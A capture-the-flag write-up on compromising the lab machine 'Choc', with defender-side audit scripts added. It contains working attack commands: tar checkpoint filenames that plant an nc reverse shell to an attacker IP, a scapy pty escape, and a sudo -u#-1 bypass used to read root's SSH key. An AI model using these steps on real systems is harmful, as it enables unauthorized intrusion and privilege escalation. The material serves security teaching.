HMV Choc Summary

2026-04-23 | 451 Words

This Linux machine leaks an SSH private key through its FTP service, but a forced command in authorized_keys limits what that key can do. After bypassing this restriction with the Shellshock vulnerability I obtain a foothold. A cron misconfiguration then lets me execute arbitrary commands to pivot to another user, and a vulnerable sudo rule lets me move laterally to root.

Scope

  • Name: Choc
  • Difficulty: (5/10)
  • OS: Linux
  • IP: choc.hmv (192.168.56.147)

Enumeration

FTP

First, I obtain an SSH private key from the FTP scan result:

21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa [NSE: writeable]

From ssh-keygen -y -f id_rsa I realize that this private key belongs to user carl.

Shellshock for SSH

I then log in directly with that key but am kicked out immediately. Searching for this situation, I find the post "how can shellshock be exploited over SSH"; following it, I successfully get a reverse shell.

carl@choc:~$ cat .ssh/authorized_keys
command="cat ~/troll.txt" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxy
UurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1
bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r/jVWlSddO1Fim373lTNpDOKj2kwNsa
9zO/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc
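The forced command only restricts anything if the login shell cannot be diverted first: sshd passes the client's requested command to the shell in the SSH_ORIGINAL_COMMAND variable, and a bash that still imports function definitions from environment variables executes it before command= takes effect. The following defender-side checks are an added example, not from the original writeup: they probe the local bash for that behaviour and list which authorized_keys entries depend on it (the sample authorized_keys file is constructed, with placeholder key bodies).

```shell
#!/bin/sh
# Added defender-side checks, not from the original writeup.  sshd exports the
# client's requested command as SSH_ORIGINAL_COMMAND and then runs the
# command="..." option through the user's login shell; an unpatched bash
# imports function definitions from any environment variable, so the forced
# command never gets a chance to restrict anything.

# Does the local bash still import functions from the environment?
# Prints "vulnerable", "patched" or "no-bash".
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    # Harmless probe: a patched bash treats the variable as plain data.
    out=$(env probe='() { :;}; echo vulnerable' bash -c 'true' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# List the entries of an authorized_keys file ($1) that rely on a command=
# option, i.e. the accounts whose restriction stands or falls with the shell.
# Output: "<line>: <options> (<key comment>)".
forced_command_keys() {
    grep -n 'command="' "$1" | while IFS= read -r line; do
        num=${line%%:*}
        rest=${line#*:}
        opts=${rest%% ssh-*}       # options end where the key type begins
        opts=${opts%% ecdsa-*}
        printf '%s: %s (%s)\n' "$num" "$opts" "${rest##* }"
    done
}

# Constructed sample modelled on the page's authorized_keys; the key bodies
# are placeholders, not real keys.
write_sample_keys() {
    printf '%s\n' \
        'command="cat ~/troll.txt" ssh-rsa AAAAB3Nza...EXAMPLE carl@choc' \
        'ssh-ed25519 AAAAC3Nza...EXAMPLE admin@choc' > "$1"
}

# Usage: check the local bash and audit the constructed sample.
sample=$(mktemp)
write_sample_keys "$sample"
echo "local bash: $(shellshock_check)"
forced_command_keys "$sample"
rm -f "$sample"
```

Note that options such as restrict or no-pty do not help here; the durable fix is a bash that no longer imports functions from the environment.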

Privilege Escalation

User Info

carl@choc:~$ ls -al /home/
total 20
drwxr-xr-x  5 root  root  4096 Apr 18  2021 .
drwxr-xr-x 19 root  root  4096 Apr 18  2021 ..
drwxr-xr-x  5 carl  carl  4096 Apr 20  2021 carl
drwxrwx---  5 sarah torki 4096 Apr 20  2021 sarah
drwxr-xr-x  6 torki torki 4096 Apr 19  2021 torki

carl@choc:~$ ls -al /home/torki/
total 44
drwxr-xr-x 6 torki torki 4096 Apr 19  2021 .
drwxr-xr-x 5 root  root  4096 Apr 18  2021 ..
-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh
lrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -> /dev/null
-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout
-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc
drwx------ 3 torki torki 4096 Apr 12  2021 .gnupg
drwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local
-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile
drwxrwxrwx 2 torki torki 4096 Apr 20  2021 secret_garden
-rw-r--r-- 1 torki torki   66 Apr 18  2021 .selected_editor
drwx------ 2 torki torki 4096 Apr 12  2021 .ssh

Notice that:

  • The secret_garden directory of user torki is world writable.
  • There's a backup.sh script that may be useful.

carl -> torki

After some basic investigation, the only interesting thing I find is this compressed file:

carl@choc:~$ find / -user torki -or -group torki 2>/dev/null
/home/sarah
/home/torki
/home/torki/.profile
/home/torki/.selected_editor
/home/torki/secret_garden
/home/torki/secret_garden/diary.txt
/home/torki/.bash_logout
/home/torki/.bashrc
/home/torki/.gnupg
/home/torki/.local
/home/torki/.local/share
/home/torki/.ssh
/home/torki/backup.sh
/tmp/backup_home.tgz

/tmp/backup_home.tgz is a compressed copy of the files in that secret_garden directory, so I guess that user torki has configured a cron job that backs up secret_garden with the backup.sh script. I quickly confirm this with pspy:

2026/04/23 09:28:01 CMD: UID=1000  PID=1350   | /bin/sh -c bash /home/torki/backup.sh
2026/04/23 09:28:01 CMD: UID=1001  PID=1349   | /bin/sh -c PATH=.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games && export PATH &&  bash /home/sarah/.local/script.sh
2026/04/23 09:28:01 CMD: UID=1001  PID=1351   | bash /home/sarah/.local/script.sh
2026/04/23 09:28:01 CMD: UID=1000  PID=1352   | bash /home/torki/backup.sh

Now things are straightforward: I can leverage the tar invocation in backup.sh to execute an arbitrary command (see https://gtfobins.org/gtfobins/tar/):

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh pwn.sh'
echo 'nc 192.168.56.1 1234 -e /bin/bash' > pwn.sh && chmod +x pwn.sh

torki -> sarah

backup.sh

torki@choc:~$ cat backup.sh
#!/bin/bash
cd /home/torki/secret_garden
tar cf /tmp/backup_home.tgz *
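The root cause in backup.sh, and of the cron pivot above, is that the shell expands * into arguments, so file names such as --checkpoint=1 dropped into the world-writable secret_garden are parsed by tar as options. As an added example (not the machine's script), the following flags such names and shows a backup that hands tar the directory with -C instead of a glob; the function names, messages and temporary paths are my own.

```shell
#!/bin/sh
# Added example, not from the original writeup: detect option-like file names
# in a backup source, and archive it without letting names reach tar's
# option parser.

# Print the number of entries in $1 whose names start with '-'; with a glob,
# each of them would be passed to tar as an option instead of a file.
option_like_names() {
    dir=$1; n=0
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue          # no match: the glob stays literal
        n=$((n + 1))
        printf 'suspicious name: %s\n' "${f##*/}" >&2
    done
    echo "$n"
}

# Hardened backup: archive the directory itself with -C, so every member is
# recorded as "./name" and no name is ever an argument.  Also refuse a source
# that other users can write to (that is what let carl plant the files), and
# keep the archive out of world-writable places such as /tmp.
safe_backup() {
    src=$1; dest=$2
    if [ -n "$(find "$src" -maxdepth 0 -perm -002)" ]; then
        echo "refusing: $src is world-writable" >&2
        return 1
    fi
    tar -cf "$dest" -C "$src" .
}

# Usage against a constructed directory containing the names from the writeup.
demo=$(mktemp -d)
touch -- "$demo/--checkpoint=1" "$demo/--checkpoint-action=exec=sh pwn.sh" "$demo/diary.txt"
echo "option-like names: $(option_like_names "$demo")"
safe_backup "$demo" "$demo.tgz" && tar -tf "$demo.tgz"
rm -rf "$demo" "$demo.tgz"
```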

The sudo rule of user torki hints at the next step:

User torki may run the following commands on choc:
    (sarah) NOPASSWD: /usr/bin/scapy

So I move laterally to user sarah through this Python program:

                     aSPY//YASa
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.0
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Craft packets like it is your last
       scccccp///pSP///p          p//Y   | day on earth.
      sY/////////y  caa           S//P   |                      -- Lao-Tze
       cayCyayP//Ya              pY/Ya   |
        sY/PsY////YCc          aC//Yp
         sc  sccaCY//PCypaapyCP//YSs
                  spCPY//////YPSps
                       ccaacs

>>> import pty
>>> pty.spawn("/bin/bash")
sarah@choc:~$ id
uid=1001(sarah) gid=1001(sarah) groups=1001(sarah)

sarah -> root

Like torki, sarah also has a flawed sudo rule, and the sudo version is vulnerable:

User sarah may run the following commands on choc:
    (ALL, !root) NOPASSWD: /usr/bin/wall

Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

Exploiting it with the following payload (see https://gtfobins.org/gtfobins/wall/):

sudo -u#-1 /usr/bin/wall --nobanner /root/.ssh/id_rsa

I can read arbitrary files; here the private key of root is broadcast to the other users of the system.
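The rule (ALL, !root) only forbids the name root: before sudo 1.8.28, -u#-1 passes the uid -1, which the privilege-dropping calls treat as "leave unchanged", so the command runs as uid 0. This audit is an added example, not from the writeup: it parses the sudo -V output shown above and classifies a sudoers rule accordingly; the function names and result words are mine.

```shell
#!/bin/sh
# Added example, not from the original writeup: decide whether a sudoers rule
# that excludes only root can be bypassed with a bogus user id.  sudo before
# 1.8.28 accepts -u#-1 and ends up running the command as uid 0, because the
# negation is matched against the user name, not the resulting uid.

# Parse "Sudo version X.Y.Z" from sudo -V output read on stdin.
sudo_version() {
    sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# version_lt A B: succeed when dot-separated version A is older than B.
version_lt() {
    [ "$1" != "$2" ] && \
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n 1)" = "$1" ]
}

# A RunAs list of the form "(ALL, !root)" or "(ALL, !#0)".
rule_is_negated_root() {
    case "$1" in
        *'(ALL,'*'!root'*|*'(ALL,'*'!#0'*) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_rule VERSION RULE prints:
#   bypassable    negated-root rule on a sudo older than 1.8.28
#   negation-only fixed sudo, but the rule still grants every other account
#   ok            no root negation involved
audit_rule() {
    ver=$1; rule=$2
    if rule_is_negated_root "$rule"; then
        if version_lt "$ver" 1.8.28; then echo bypassable; else echo negation-only; fi
    else
        echo ok
    fi
}

# Usage with the values from this machine (sudo -V output reproduced inline).
v=$(printf 'Sudo version 1.8.23\nSudoers policy plugin version 1.8.23\n' | sudo_version)
echo "sudo $v: $(audit_rule "$v" '(ALL, !root) NOPASSWD: /usr/bin/wall')"
```

Even on a fixed sudo, a negation-only rule is a smell: the safer sudoers form names the intended target account explicitly instead of ALL minus root.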
